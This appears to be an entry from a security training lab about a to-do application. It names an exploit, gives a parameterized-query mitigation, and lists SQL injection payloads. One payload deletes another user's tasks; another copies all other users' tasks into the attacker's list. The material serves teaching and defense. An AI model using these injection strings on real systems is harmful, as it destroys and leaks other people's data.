Exploit Insert malicious data into the application to destroy other users' data
Mitigation Perform server-side validation and parameterize user-supplied data before use.
Write Up | VideoSay goodbye, user1', 0, '1'); DELETE FROM todo WHERE user_id = '1'; INSERT INTO todo (task_description, task_complete, user_id) VALUES ('All gone
A first task', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) VALUES ('A second task', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) VALUES ('A final task
vvvvvStart of other user tasksvvvvv', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) SELECT task_description, task_complete, '{{user_id}}' FROM todo WHERE user_id != '{{user_id}}'; INSERT INTO todo (task_description, task_complete, user_id) VALUES ('^^^^^End of other user tasks^^^^^